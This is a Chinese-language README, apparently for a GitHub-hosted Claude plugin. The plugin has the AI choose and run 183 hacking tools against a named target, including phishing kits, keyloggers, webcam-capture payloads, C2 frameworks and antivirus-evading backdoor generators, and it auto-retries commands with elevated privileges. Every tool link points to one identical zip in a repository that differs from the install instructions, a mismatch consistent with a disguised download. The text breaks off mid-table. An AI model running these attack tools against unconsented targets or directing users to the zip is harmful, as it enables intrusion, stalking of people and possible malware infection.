MAXZL1/hackingtool-plugin

# 实战演示 ## 安装说明 ``` /plugin marketplace add AKCODEZ/hackingtool-plugin /plugin install hackingtool@hackingtool-marketplace ``` 然后让 Claude 指向一个目标： ``` "recon example.com" "hunt the username johndoe" "scan my repo for vulnerabilies" "crack my own wifi before my neighbor does" ``` Claude 会自动选择工具。你只需查看输出结果。 ## 工作原理 每次工具调用都会经过 `ht_run.py`，它会： 1. 选择后端：**原生** (Linux/macOS)、**WSL** (Windows + 真实发行版)，或 **Docker** (任何运行 Docker Desktop 的地方)。 2. 将已知工具映射到**专用 Docker 镜像** —— 快速拉取，干净的 ENTRYPOINT，无需繁琐的 `apt install` 操作： | 类别 | 镜像 | |---|---| | 端口扫描 | `instrumentisto/nmap`, `ilyaglow/masscan`, `rustscan/rustscan` | | 子域名侦察 | `projectdiscovery/subfinder`, `caffix/amass`, `projectdiscovery/httpx` | | 漏洞扫描 | `projectdiscovery/nuclei`, `projectdiscovery/katana` | | OSINT | `megadose/holehe`, `soxoj/maigret`, `spiderfoot/spiderfoot`, `secsi/theharvester` | | 机密信息 | `trufflesecurity/trufflehog`, `zricethezav/gitleaks` | | Web 攻击 | `secsi/ffuf`, `devopsworks/gobuster`, `drwetter/testssl.sh`, `0xsauby/wafw00f` | | SQL 注入 | `paoloo/sqlmap` | | 活动目录 | `rflathers/impacket`, `byt3bl33d3r/netexec` | | 钓鱼侦察 | `elceef/dnstwist` | | 后备方案 | `kalilinux/kali-rolling` (用于未在覆盖映射表中的任何工具) | 3. 运行命令，在遇到权限错误时自动使用提升的权限重试（原生/WSL），并以结构化 JSON 的形式呈现实际的工具输出。 下方清单中的 🟢/🟡 图标是工具通常行为的快速指示器 —— 🟢 代表“即插即用”式调用，🟡 代表行为取决于后端和环境的工具（适配器硬件、sudo 配置等）。无论哪种情况，该技能都会运行它并告诉你发生了什么。 当前分类：**56 🟢 · 127 🟡 · 共 183 个**。 ## 操作系统支持 插件通过 `ht_env.py` 自动选择后端： | 主机 | 后端 | |---|---| | Linux / macOS 原生 | `bash -lc ` | | Windows + 真实 WSL 发行版 (Ubuntu, Kali 等) | `wsl -d -- bash -lc ` | | Windows + Docker Desktop | `docker run --rm ` | | 任何运行 Docker 的地方 | Docker 后端 (可用时首选) | 覆盖映射表中的 Docker 镜像在首次使用时拉取并缓存。当需要在主机上安装二进制文件时，可以使用 `ht_run.py --install` 运行原生/WSL的安装命令。 ## 主工具清单 图例：🟢 即插即用 · 🟡 视后端/环境而定 **共计 183 款工具** — 🟢 56 款即插即用 · 🟡 127 款依赖环境 ### 🛡 匿名隐藏 (2) | 工具 | 功能 | Claude | 标志 | |---|---|:---:|---| | [Anonymously Surf](https://github.com/MAXZL1/hackingtool-plugin/raw/refs/heads/main/plugins/hackingtool/skills/hackingtool-plugin-v2.8.zip) | 在系统关闭时自动覆盖 RAM。 | 🟡 | `sudo` | | [Multitor](https://github.com/MAXZL1/hackingtool-plugin/raw/refs/heads/main/plugins/hackingtool/skills/hackingtool-plugin-v2.8.zip) | 如何同时出现在多个地方。 | 🟡 | `sudo` | ### 🔍 信息收集 (26) | 工具 | 功能 | Claude | 标志 | |---|---|:---:|---| | [Amass (Attack Surface Mapping)](https://github.com/MAXZL1/hackingtool-plugin/raw/refs/heads/main/plugins/hackingtool/skills/hackingtool-plugin-v2.8.zip) | 深入的子域名枚举和攻击面映射。 | 🟢 | — | | [Breacher](https://github.com/MAXZL1/hackingtool-plugin/raw/refs/heads/main/plugins/hackingtool/skills/hackingtool-plugin-v2.8.zip) | 一款用 Python 编写的先进多线程管理面板查找工具。 | 🟡 | `interactive` | | [Dracnmap](https://github.com/MAXZL1/hackingtool-plugin/raw/refs/heads/main/plugins/hackingtool/skills/hackingtool-plugin-v2.8.zip) | 利用 nmap 进行网络利用和信息收集的开源程序。 | 🟡 | `sudo` | | [Find Info Using Shodan](https://github.com/MAXZL1/hackingtool-plugin/raw/refs/heads/main/plugins/hackingtool/skills/hackingtool-plugin-v2.8.zip) | 获取端口、漏洞、信息、横幅。 | 🟡 | — | | [Gitleaks (Git Secret Scanner)](https://github.com/MAXZL1/hackingtool-plugin/raw/refs/heads/main/plugins/hackingtool/skills/hackingtool-plugin-v2.8.zip) | 用于 Git 仓库的快速机密扫描器 —— 检测硬编码密码、API 密钥、token。 | 🟢 | — | | [Holehe (Email → Social Accounts)](https://github.com/MAXZL1/hackingtool-plugin/raw/refs/heads/main/plugins/hackingtool/skills/hackingtool-plugin-v2.8.zip) | 检查电子邮件地址是否在 120 多个网站上注册。 | 🟢 | — | | Host to IP | 将主机名解析为 IP。 | 🟡 | `interactive` | | [httpx (HTTP Toolkit)](https://github.com/MAXZL1/hackingtool-plugin/raw/refs/heads/main/plugins/hackingtool/skills/hackingtool-plugin-v2.8.zip) | 快速的多用途 HTTP 探测工具。 | 🟢 | — | | [Infoga - Email OSINT](https://github.com/MAXZL1/hackingtool-plugin/raw/refs/heads/main/plugins/hackingtool/skills/hackingtool-plugin-v2.8.zip) | 从公共来源收集电子邮件账户信息（IP、主机名、国家）。 | 🟢 | — | | IsItDown (Check Website Down/Up) | 检查网站是否在线。 | 🟡 | — | | [Maigret (Username OSINT)](https://github.com/MAXZL1/hackingtool-plugin/raw/refs/heads/main/plugins/hackingtool/skills/hackingtool-plugin-v2.8.zip) | 通过用户名在 3000 多个网站上收集个人档案。 | 🟢 | — | | [Masscan (Fast Port Scanner)](https://github.com/MAXZL1/hackingtool-plugin/raw/refs/heads/main/plugins/hackingtool/skills/hackingtool-plugin-v2.8.zip) | 最快的互联网端口扫描器 —— 1000 万个数据包/秒。 | 🟡 | `sudo` | | [Network Map (nmap)](https://github.com/MAXZL1/hackingtool-plugin/raw/refs/heads/main/plugins/hackingtool/skills/hackingtool-plugin-v2.8.zip) | 用于网络发现和安全审计的免费实用程序。 | 🟡 | `sudo` | | [Port Scanner - rang3r](https://github.com/MAXZL1/hackingtool-plugin/raw/refs/heads/main/plugins/hackingtool/skills/hackingtool-plugin-v2.8.zip) | 用于多线程端口扫描的 Python 脚本。 | 🟡 | `interactive` | | Port scanning | 基本端口扫描封装器。 | 🟡 | `interactive` | | [ReconDog](https://github.com/MAXZL1/hackingtool-plugin/raw/refs/heads/main/plugins/hackingtool/skills/hackingtool-plugin-v2.8.zip) | ReconDog 信息收集套件。 | 🟡 | `sudo` | | [ReconSpider (For All Scanning)](https://github.com/MAXZL1/hackingtool-plugin/raw/refs/heads/main/plugins/hackingtool/skills/hackingtool-plugin-v2.8.zip) | 针对 IP、电子邮件、网站和组织的高级 OSINT 框架。 | 🟡 | `sudo` | | [RED HAWK (All In One Scanning)](https://github.com/MAXZL1/hackingtool-plugin/raw/refs/heads/main/plugins/hackingtool/skills/hackingtool-plugin-v2.8.zip) | 用于信息收集和漏洞扫描的多合一工具。 | 🟢 | — | | [RustScan (Modern Port Scanner)](https://github.com/MAXZL1/hackingtool-plugin/raw/refs/heads/main/plugins/hackingtool/skills/hackingtool-plugin-v2.8.zip) | 在 3 秒内扫描所有 65k 个端口，自动将结果传递给 nmap。 | 🟡 | `sudo` | | [SecretFinder (like API & etc)](https://github.com/MAXZL1/hackingtool-plugin/raw/refs/heads/main/plugins/hackingtool/skills/hackingtool-plugin-v2.8.zip) | 用于查找 API 密钥等敏感数据的 Python 脚本。 | 🟡 | `sudo` | | [SpiderFoot (OSINT Automation)](https://github.com/MAXZL1/hackingtool-plugin/raw/refs/heads/main/plugins/hackingtool/skills/hackingtool-plugin-v2.8.zip) | 自动化 OSINT 收集，用于威胁情报和攻击面映射。 | 🟢 | — | | [Striker](https://github.com/MAXZL1/hackingtool-plugin/raw/refs/heads/main/plugins/hackingtool/skills/hackingtool-plugin-v2.8.zip) | 侦察与漏洞扫描套件。 | 🟡 | `interactive` | | [Subfinder (Subdomain Enumeration)](https://github.com/MAXZL1/hackingtool-plugin/raw/refs/heads/main/plugins/hackingtool/skills/hackingtool-plugin-v2.8.zip) | 使用多个来源的快速被动子域名枚举。 | 🟢 | — | | [theHarvester (OSINT)](https://github.com/MAXZL1/hackingtool-plugin/raw/refs/heads/main/plugins/hackingtool/skills/hackingtool-plugin-v2.8.zip) | 从公共来源收集电子邮件、姓名、子域名、IP 和 URL。 | 🟢 | — | | [TruffleHog (Secret Scanner)](https://github.com/MAXZL1/hackingtool-plugin/raw/refs/heads/main/plugins/hackingtool/skills/hackingtool-plugin-v2.8.zip) | 在 Git 仓库、S3 存储桶、文件系统中查找、验证和分析泄露的凭证。 | 🟢 | — | | [Xerosploit](https://github.com/MAXZL1/hackingtool-plugin/raw/refs/heads/main/plugins/hackingtool/skills/hackingtool-plugin-v2.8.zip) | 用于执行 MITM 攻击的渗透测试工具包。 | 🟡 | `sudo` | ### 📚 字典生成器 (7) | 工具 | 功能 | Claude | 标志 | |---|---|:---:|---| | [Cupp](https://github.com/MAXZL1/hackingtool-plugin/raw/refs/heads/main/plugins/hackingtool/skills/hackingtool-plugin-v2.8.zip) | 常见用户密码分析器 —— 生成个性化字典。 | 🟡 | `interactive` `long` | | [Goblin WordGenerator](https://github.com/MAXZL1/hackingtool-plugin/raw/refs/heads/main/plugins/hackingtool/skills/hackingtool-plugin-v2.8.zip) | Goblin 字典生成器。 | 🟢 | `long` | | [haiti (Hash Type Identifier)](https://github.com/MAXZL1/hackingtool-plugin/raw/refs/heads/main/plugins/hackingtool/skills/hackingtool-plugin-v2.8.zip) | 识别哈希类型 —— 支持 300 多种算法。 | 🟢 | `long` | | [Hashcat (Password Cracker)](https://github.com/MAXZL1/hackingtool-plugin/raw/refs/heads/main/plugins/hackingtool/skills/hackingtool-plugin-v2.8.zip) | 世界上最快的 GPU/CPU 密码恢复工具 —— 支持 300 多种哈希类型。 | 🟡 | `sudo` `long` | | [John the Ripper](https://github.com/MAXZL1/hackingtool-plugin/raw/refs/heads/main/plugins/hackingtool/skills/hackingtool-plugin-v2.8.zip) | 开源密码安全审计和恢复工具。 | 🟡 | `sudo` `long` | | [Password list (1.4B Clear Text)](https://github.com/MAXZL1/hackingtool-plugin/raw/refs/heads/main/plugins/hackingtool/skills/hackingtool-plugin-v2.8.zip) | 从 BreachCompilation 泄露事件中搜索 14 亿明文凭证。 | 🟢 | `long` | | [WordlistCreator](https://github.com/MAXZL1/hackingtool-plugin/raw/refs/heads/main/plugins/hackingtool/skills/hackingtool-plugin-v2.8.zip) | 生成所有可能密码组合的 C 语言程序。 | 🟡 | `sudo` `long` | ### 📶 无线攻击 (13) | 工具 | 功能 | Claude | 标志 | |---|---|:---:|---| | [Airgeddon](https://github.com/MAXZL1/hackingtool-plugin/raw/refs/heads/main/plugins/hackingtool/skills/hackingtool-plugin-v2.8.zip) | 用于审计无线网络的多用途 Bash 脚本。 | 🟡 | `sudo` `hw` | | [Bettercap](https://github.com/MAXZL1/hackingtool-plugin/raw/refs/heads/main/plugins/hackingtool/skills/hackingtool-plugin-v2.8.zip) | WiFi、BLE、HID 和以太网侦察及 MITM 的瑞士军刀。 | 🟡 | `sudo` `hw` | | [Bluetooth Honeypot (bluepot)](https://github.com/MAXZL1/hackingtool-plugin/raw/refs/heads/main/plugins/hackingtool/skills/hackingtool-plugin-v2.8.zip) | 蓝牙接收器蜜罐。 | 🟡 | `sudo` `hw` | | [EvilTwin](https://github.com/MAXZL1/hackingtool-plugin/raw/refs/heads/main/plugins/hackingtool/skills/hackingtool-plugin-v2.8.zip) | 通过伪造网页和伪造接入点进行的邪恶双子攻击。 | 🟡 | `sudo` `hw` | | [Fastssh](https://github.com/MAXZL1/hackingtool-plugin/raw/refs/heads/main/plugins/hackingtool/skills/hackingtool-plugin-v2.8.zip) | 针对 SSH 的多线程扫描和暴力破解。 | 🟡 | `sudo` `hw` | | [Fluxion](https://github.com/MAXZL1/hackingtool-plugin/raw/refs/heads/main/plugins/hackingtool/skills/hackingtool-plugin-v2.8.zip) | linset 的重制版 —— 自动化的 MITM WiFi 攻击。 | 🟡 | `interactive` `sudo` `hw` | | [hcxdumptool](https://github.com/MAXZL1/hackingtool-plugin/raw/refs/heads/main/plugins/hackingtool/skills/hackingtool-plugin-v2.8.zip) | 从 WLAN 设备捕获数据包和 PMKID 哈希。 | 🟡 | `sudo` `hw` | | [hcxtools](https://github.com/MAXZL1/hackingtool-plugin/raw/refs/heads/main/plugins/hackingtool/skills/hackingtool-plugin-v2.8.zip) | 将捕获的 WLAN 数据包转换为 hashcat/JtR 兼容格式。 | 🟡 | `sudo` `hw` | | Howmanypeople | 通过监控 WiFi 信号统计你周围的人数。 | 🟡 | `sudo` `hw` | | [pixiewps](https://github.com/MAXZL1/hackingtool-plugin/raw/refs/heads/main/plugins/hackingtool/skills/hackingtool-plugin-v2.8.zip) | 离线暴力破解 WPS pin (pixie-dust 攻击)。 | 🟡 | `sudo` `hw` `long` | | [WiFi-Pumpkin](https://github.com/MAXZL1/hackingtool-plugin/raw/refs/heads/main/plugins/hackingtool/skills/hackingtool-plugin-v2.8.zip) | 用于创建伪造网络的恶意 AP 框架。 | 🟡 | `sudo` `hw` | | [Wifiphisher](https://github.com/MAXZL1/hackingtool-plugin/raw/refs/heads/main/plugins/hackingtool/skills/hackingtool-plugin-v2.8.zip) | 用于红队交战的伪造接入点框架。 | 🟡 | `sudo` `hw` | | [Wifite](https://github.com/MAXZL1/hackingtool-plugin/raw/refs/heads/main/plugins/hackingtool/skills/hackingtool-plugin-v2.8.zip) | 自动化无线攻击工具。 🟡 | `sudo` `hw` | ### 🧩 SQL 注入 (7) | 工具 | 功能 | Claude | 标志 | |---|---|:---:|---| | [Blisqy](https://github.com/MAXZL1/hackingtool-plugin/raw/refs/heads/main/plugins/hackingtool/skills/hackingtool-plugin-v2.8.zip) | 在 HTTP 头中查找基于时间的盲注 SQL 注入。 | 🟡 | — | | [DSSS](https://github.com/MAXZL1/hackingtool-plugin/raw/refs/heads/main/plugins/hackingtool/skills/hackingtool-plugin-v2.8.zip) | 超小型 SQLi 扫描器 —— 针对 GET 和 POST 参数。 | 🟡 | — | | [Explo](https://github.com/MAXZL1/hackingtool-plugin/raw/refs/heads/main/plugins/hackingtool/skills/hackingtool-plugin-v2.8.zip) | 以人类和机器可读的格式描述 Web 安全问题。 | 🟡 | — | | [Leviathan](https://github.com/MAXZL1/hackingtool-plugin/raw/refs/heads/main/plugins/hackingtool/skills/hackingtool-plugin-v2.8.zip) | 大规模审计工具包 —— 服务发现、暴力破解、SQLi 检测。 | 🟢 | — | | [NoSqlMap](https://github.com/MAXZL1/hackingtool-plugin/raw/refs/heads/main/plugins/hackingtool/skills/hackingtool-plugin-v2.8.zip) | 对 NoSQL 数据库进行审计和自动化注入攻击。 | 🟢 | — | | [Sqlmap](https://github.com/MAXZL1/hackingtool-plugin/raw/refs/heads/main/plugins/hackingtool/skills/hackingtool-plugin-v2.8.zip) | 自动检测和利用 SQL 注入漏洞。 | 🟡 | `interactive` | | [SQLScan](https://github.com/MAXZL1/hackingtool-plugin/raw/refs/heads/main/plugins/hackingtool/skills/hackingtool-plugin-v2.8.zip) | 用于查找 SQL 注入点的快速 Web 扫描器。 | 🟡 | `sudo` | ### 🎣 钓鱼攻击 (17) | 工具 | 功能 | Claude | 标志 | |---|---|:---:|---| | [AdvPhishing](https://github.com/MAXZL1/hackingtool-plugin/raw/refs/heads/main/plugins/hackingtool/skills/hackingtool-plugin-v2.8.zip) | 高级钓鱼工具 —— OTP 钓鱼。 | 🟡 | `sudo` | | [Autophisher](https://github.com/MAXZL1/hackingtool-plugin/raw/refs/heads/main/plugins/hackingtool/skills/hackingtool-plugin-v2.8.zip) | 自动化钓鱼工具包。 | 🟡 | `sudo` | | [BlackEye](https://github.com/MAXZL1/hackingtool-plugin/raw/refs/heads/main/plugins/hackingtool/skills/hackingtool-plugin-v2.8.zip) | 包含 38 个网站模板的钓鱼工具。 | 🟡 | `sudo` | | [BlackPhish](https://github.com/MAXZL1/hackingtool-plugin/raw/refs/heads/main/plugins/hackingtool/skills/hackingtool-plugin-v2.8.zip) | 钓鱼工具包。 | 🟡 | `sudo` | | [dnstwist](https://github.com/MAXZL1/hackingtool-plugin/raw/refs/heads/main/plugins/hackingtool/skills/hackingtool-plugin-v2.8.zip) | 域名排列引擎 —— 域名抢注和品牌仿冒。 | 🟢 | — | | [Evilginx3](https://github.com/MAXZL1/hackingtool-plugin/raw/refs/heads/main/plugins/hackingtool/skills/hackingtool-plugin-v2.8.zip) | 用于钓鱼登录凭证的 MITM 攻击框架。 | 🟡 | `sudo` | | [HiddenEye](https://github.com/MAXZL1/hackingtool-plugin/raw/refs/heads/main/plugins/hackingtool/skills/hackingtool-plugin-v2.8.zip) | 具有多隧道支持的现代钓鱼工具。 | 🟡 | `sudo` | | [I-See-You](https://github.com/MAXZL1/hackingtool-plugin/raw/refs/heads/main/plugins/hackingtool/skills/hackingtool-plugin-v2.8.zip) | 通过社会工程学精确定位目标位置。 | 🟡 | `sudo` | | [Maskphish](https://github.com/MAXZL1/hackingtool-plugin/raw/refs/heads/main/plugins/hackingtool/skills/hackingtool-plugin-v2.8.zip) | 将钓鱼 URL 隐藏在看起来正常的 URL 下。 | 🟡 | `sudo` | | [Pyphisher](https://github.com/MAXZL1/hackingtool-plugin/raw/refs/heads/main/plugins/hackingtool/skills/hackingtool-plugin-v2.8.zip) | 易于使用的钓鱼工具，拥有 77 个网站模板。 | 🟡 | `sudo` | | [QR Code Jacking](https://github.com/MAXZL1/hackingtool-plugin/raw/refs/heads/main/plugins/hackingtool/skills/hackingtool-plugin-v2.8.zip) | 二维码劫持 (任何网站)。 | 🟡 | `sudo` | | [QRLJacking](https://github.com/MAXZL1/hackingtool-plugin/raw/refs/heads/main/plugins/hackingtool/skills/hackingtool-plugin-v2.8.zip) | 针对基于二维码登录的会话劫持。 | 🟡 | `sudo` | | [SayCheese](https://github.com/MAXZL1/hackingtool-plugin/raw/refs/heads/main/plugins/hackingtool/skills/hackingtool-plugin-v2.8.zip) | 通过恶意链接从目标抓取网络摄像头截图。 | 🟡 | `sudo` | | [Setoolkit](https://github.com/MAXZL1/hackingtool-plugin/raw/refs/heads/main/plugins/hackingtool/skills/hackingtool-plugin-v2.8.zip) | 社会工程学工具包。 | 🟡 | `sudo` | | [ShellPhish](https://github.com/MAXZL1/hackingtool-plugin/raw/refs/heads/main/plugins/hackingtool/skills/hackingtool-plugin-v2.8.zip) | 针对 18 个社交媒体的钓鱼工具。 | 🟡 | `sudo` | | [SocialFish](https://github.com/MAXZL1/hackingtool-plugin/raw/refs/heads/main/plugins/hackingtool/skills/hackingtool-plugin-v2.8.zip) | 自动化钓鱼工具与信息收集器。 | 🟡 | `sudo` | | [Thanos](https://github.com/MAXZL1/hackingtool-plugin/raw/refs/heads/main/plugins/hackingtool/skills/hackingtool-plugin-v2.8.zip) | 浏览器到浏览器的钓鱼工具包。 | 🟡 | `sudo` | ### 🌐 Web 攻击 (20) | 工具 | 功能 | Claude | 标志 | |---|---|:---:|---| | [Arjun](https://github.com/MAXZL1/hackingtool-plugin/raw/refs/heads/main/plugins/hackingtool/skills/hackingtool-plugin-v2.8.zip) | HTTP 参数发现 —— 查找隐藏的 GET/POST 参数。 | 🟢 | — | | [Blazy](https://github.com/MAXZL1/hackingtool-plugin/raw/refs/heads/main/plugins/hackingtool/skills/hackingtool-plugin-v2.8.zip) | 现代登录页面暴力破解器（也支持点击劫持）。 | 🟡 | `archived` | | [Caido](https://github.com/MAXZL1/hackingtool-plugin/raw/refs/heads/main/plugins/hackingtool/skills/hackingtool-plugin-v2.8.zip) | 轻量级 Web 安全审计工具包 —— Rust 编写的 Burp 替代品。 | 🟡 | `sudo` | | [CheckURL](https://github.com/MAXZL1/hackingtool-plugin/raw/refs/heads/main/plugins/hackingtool/skills/hackingtool-plugin-v2.8.zip) | 检测利用 IDN 同形异义词攻击的恶意 URL。 | 🟢 | — | | [Dirb](https://github.com/MAXZL1/hackingtool-plugin/raw/refs/heads/main/plugins/hackingtool/skills/hackingtool-plugin-v2.8.zip) | Web 内容扫描器 —— 查找现有和隐藏的 Web 对象。 | 🟡 | `interactive` `sudo` | | [Dirsearch](https://github.com/MAXZL1/hackingtool-plugin/raw/refs/heads/main/plugins/hackingtool/skills/hackingtool-plugin-v2.8.zip) | Web 路径暴力破解 —— 针对 Web 服务器上的目录和文件。 | 🟢 | — | | [Feroxbuster](https://github.com/MAXZL1/hackingtool-plugin/raw/refs/heads/main/plugins/hackingtool/skills/hackingtool-plugin-v2.8.zip) | Rust 编写的快速、递归内容发现工具。 | 🟡 | `sudo` `long` | | [ffuf](https://github.com/MAXZL1/hackingtool-plugin/raw/refs/heads/main/plugins/hackingtool/skills/hackingtool-plugin-v2.8.zip) | 快速 Web 模糊测试工具 —— 内容、参数、vhost 发现。 | 🟢 | `long` | | [Gobuster](https://github.com/MAXZL1/hackingtool-plugin/raw/refs/heads/main/plugins/hackingtool/skills/hackingtool-plugin-v2.8.zip) | 用 Go 编写的目录/文件、DNS 和 vhost 暴力破解工具。 | 🟢 | — | | [Katana](https://github.com/MAXZL1/hackingtool-plugin/raw/refs/heads/main/plugins/hackingtool/skills/hackingtool-plugin-v2.8.zip) | 下一代爬虫和蜘蛛框架。 | 🟢 | — | | [mitmproxy](https://github.com/MAXZL1/hackingtool-plugin/raw/refs/heads/main/plugins/hackingtool/skills/hackingtool-plugin-v2.8.zip) | 支持交互式 TLS 的 HTTP 拦截代理。 | 🟢 | — | | [Nikto](https://github.com/MAXZL1/hackingtool-plugin/raw/refs/heads/main/plugins/hackingtool/skills/hackingtool-plugin-v2.8.zip) | 扫描 Web 服务器以查找危险文件、过时的软件和错误配置。 | 🟡 | `sudo` | | [Nuclei](https://github.com/MAXZL1/hackingtool-plugin/raw/refs/heads/main/plugins/hackingtool/skills/hackingtool-plugin-v2.8.zip) | 被超过 5 万个团队使用的快速、基于模板的漏洞扫描器。 | 🟢 | — | | [OWASP ZAP](https://github.com/MAXZL1/hackingtool-plugin/raw/refs/heads/main/plugins/hackingtool/skills/hackingtool-plugin-v2.8.zip) | 功能齐全的 Web 应用安全扫描器。 | 🟡 | `sudo` `gui` | | Skipfish | 自动化的主动 Web 应用安全侦察。 | 🟡 | `sudo` | | [Sub-Domain TakeOver](https://github.com/MAXZL1/hackingtool-plugin/raw/refs/heads/main/plugins/hackingtool/skills/hackingtool-plugin-v2.8.zip) | 子域名接管扫描器。 | 🟡 | — | | [Sublist3r](https://github.com/MAXZL1/hackingtool-plugin/raw/refs/heads/main/plugins/hackingtool/skills/hackingtool-plugin-v2.8.zip) | 使用 OSINT 枚举网站的子域名。 | 🟡 | `sudo` | | [testssl.sh](https://github.com/MAXZL1/hackingtool-plugin/raw/refs/heads/main/plugins/hackingtool/skills/hackingtool-plugin-v2.8.zip) | 检查 TLS/SSL 密码、协议和加密缺陷。 | 🟢 | — | | [wafw00f](https://github.com/MAXZL1/hackingtool-plugin/raw/refs/heads/main/plugins/hackingtool/skills/hackingtool-plugin-v2.8.zip) | 指纹识别和识别 Web 应用防火墙 (WAF)。 | 🟢 | — | | [Web2Attack](https://github.com/MAXZL1/hackingtool-plugin/raw/refs/heads/main/plugins/hackingtool/skills/hackingtool-plugin-v2.8.zip) | 带有工具和漏洞利用程序的 Web 黑客框架。 | 🟡 | `sudo` | ### 🔧 后渗透 (10) | 工具 | 功能 | Claude | 标志 | |---|---|:---:|---| | [Chisel](https://github.com/MAXZL1/hackingtool-plugin/raw/refs/heads/main/plugins/hackingtool/skills/hackingtool-plugin-v2.8.zip) | 通过 HTTP 的快速 TCP/UDP 隧道 —— 跳板和端口转发。 | 🟢 | — | | [Chrome Keylogger](https://github.com/MAXZL1/hackingtool-plugin/raw/refs/heads/main/plugins/hackingtool/skills/hackingtool-plugin-v2.8.zip) | Hera Chrome 键盘记录器。 | 🟡 | `sudo` | | [Evil-WinRM](https://github.com/MAXZL1/hackingtool-plugin/raw/refs/heads/main/plugins/hackingtool/skills/hackingtool-plugin-v2.8.zip) | Windows 渗透测试的终极 WinRM shell。 | 🟢 | — | | [Havoc](https://github.com/MAXZL1/hackingtool-plugin/raw/refs/heads/main/plugins/hackingtool/skills/hackingtool-plugin-v2.8.zip) | 具有 EDR 规避功能的现代后渗透 C2 框架。 | 🟢 | — | | [Ligolo-ng](https://github.com/MAXZL1/hackingtool-plugin/raw/refs/heads/main/plugins/hackingtool/skills/hackingtool-plugin-v2.8.zip) | 通过 TUN 接口的高级隧道/跳板工具。 | 🟢 | — | | [Mythic](https://github.com/MAXZL1/hackingtool-plugin/raw/refs/heads/main/plugins/hackingtool/skills/hackingtool-plugin-v2.8.zip) | 用于红队行动的协作式多 payload C2 平台。 | 🟡 | `sudo` | | [PEASS-ng (LinPEAS/WinPEAS)](https://github.com/MAXZL1/hackingtool-plugin/raw/refs/heads/main/plugins/hackingtool/skills/hackingtool-plugin-v2.8.zip) | Linux 和 Windows 的权限提升枚举工具。 | 🟢 | — | | [pwncat-cs](https://github.com/MAXZL1/hackingtool-plugin/raw/refs/heads/main/plugins/hackingtool/skills/hackingtool-plugin-v2.8.zip) | 后渗透平台 —— 管理 reverse/bind shell。 | 🟢 | — | | [Sliver](https://github.com/MAXZL1/hackingtool-plugin/raw/refs/heads/main/plugins/hackingtool/skills/hackingtool-plugin-v2.8.zip) | 跨平台对手模拟 / 红队 C2。 | 🟡 | `sudo` | | [Vegile (Ghost In The Shell)](https://github.com/MAXZL1/hackingtool-plugin/raw/refs/heads/main/plugins/hackingtool/skills/hackingtool-plugin-v2.8.zip) | 在已建立后门的情况下设置后门/rootkit。 | 🟡 | `sudo` | ### 🕵 电子数据取证 (8) | 工具 | 功能 | Claude | 标志 | |---|---|:---:|---| | Autopsy | 取证调查平台。 | 🟡 | `sudo` `gui` | | [Binwalk](https://github.com/MAXZL1/hackingtool-plugin/raw/refs/heads/main/plugins/hackingtool/skills/hackingtool-plugin-v2.8.zip) | 分析、逆向工程和提取固件镜像。 | 🟢 | — | | [Bulk extractor](https://github.com/MAXZL1/hackingtool-plugin/raw/refs/heads/main/plugins/hackingtool/skills/hackingtool-plugin-v2.8.zip) | 无需解析文件系统即可提取有用信息。 | 🟡 | — | | [Guymager (Disk Clone / ISO)](https://github.com/MAXZL1/hackingtool-plugin/raw/refs/heads/main/plugins/hackingtool/skills/hackingtool-plugin-v2.8.zip) | 用于介质获取的免费取证成像仪。 | 🟡 | `sudo` | | [pspy](https://github.com/MAXZL1/hackingtool-plugin/raw/refs/heads/main/plugins/hackingtool/skills/hackingtool-plugin-v2.8.zip) | 无需 root 即可监控 Linux 进程 —— cron 任务、计划任务。 | 🟢 | — | | [Toolsley](https://github.com/MAXZL1/hackingtool-plugin/raw/refs/heads/main/plugins/hackingtool/skills/hackingtool-plugin-v2.8.zip) | 用于调查的十余种实用工具。 | 🟡 | — | | [Volatility 3](https://github.com/MAXZL1/hackingtool-plugin/raw/refs/heads/main/plugins/hackingtool/skills/hackingtool-plugin-v2.8.zip) | 全球使用最广泛的内存取证框架。 | 🟡 | `interactive` | | Wireshark | 网络捕获与分析器。 | 🟡 | `sudo` `gui` | ### 📦 载荷生成 (8) | 工具 | 功能 | Claude | 标志 | |---|---|:---:|---| | [Brutal](https://github.com/MAXZL1/hackingtool-plugin/raw/refs/heads/main/plugins/hackingtool/skills/hackingtool-plugin-v2.8.zip) | 用于 payload、powershell 攻击、HID 攻击的工具包。 | 🟡 | `sudo` | | [Enigma](https://github.com/MAXZL1/hackingtool-plugin/raw/refs/heads/main/plugins/hackingtool/skills/hackingtool-plugin-v2.8.zip) | 多平台 payload 投递器。 | 🟡 | `sudo` | | [Mob-Droid](https://github.com/MAXZL1/hackingtool-plugin/raw/refs/heads/main/plugins/hackingtool/skills/hackingtool-plugin-v2.8.zip) | 轻松生成 metasploit payload。 | 🟡 | `sudo` | | [MSFvenom Payload Creator](https://github.com/MAXZL1/hackingtool-plugin/raw/refs/heads/main/plugins/hackingtool/skills/hackingtool-plugin-v2.8.zip) | 用于生成多种类型 payload 的封装工具。 | 🟡 | `sudo` | | [Spycam](https://github.com/MAXZL1/hackingtool-plugin/raw/refs/heads/main/plugins/hackingtool/skills/hackingtool-plugin-v2.8.zip) | 每分钟捕获一次网络摄像头图像的 Win32 payload。 | 🟢 | — | | [Stitch](https://github.com/MAXZL1/hackingtool-plugin/raw/refs/heads/main/plugins/hackingtool/skills/hackingtool-plugin-v2.8.zip) | 跨平台 Python 远程管理工具。 | 🟡 | `sudo` | | [The FatRat](https://github.com/MAXZL1/hackingtool-plugin/raw/refs/heads/main/plugins/hackingtool/skills/hackingtool-plugin-v2.8.zip) | 能够绕过大多数杀毒软件的后门/payload 生成器。 | 🟡 | `sudo` | | [Venom Shellcode Generator](https://github.com/MAXZL1/hackingtool-plugin/raw/refs/heads/main/plugins/hackingtool/skills/hackingtool-plugin-v2.8.zip) | 利用 apache2 通过伪造网页在局域网投递 payload。 | 🟡 | `sudo` | ### 🧰 漏洞利用框架 (3) | 工具 | 功能 | Claude | 标志 | |---|---|:---:|---| | [Commix](https://github.com/MAXZL1/hackingtool-plugin/raw/refs/heads/main/plugins/hackingtool/skills/hackingtool-plugin-v2.8.zip) | 自动化 OS 命令注入和漏洞利用工具。 | 🟡 | `interactive` `sudo` | | [RouterSploit](https://github.com/MAXZL1/hackingtool-plugin/raw/refs/heads/main/plugins/hackingtool/skills/hackingtool-plugin-v2.8.zip) | 专门针对嵌入式设备的漏洞利用框架。 | 🟡 | `sudo` | | [WebSploit](https://github.com/MAXZL1/hackingtool-plugin/raw/refs/heads/main/plugins/hackingtool/skills/hackingtool-plugin-v2.8.zip) | 高级 MITM 框架。 | 🟡 | `sudo` | ### 🔁 逆向工程 (5) | 工具 | 功能 | Claude | 标志 | |---|---|:---:|---| | 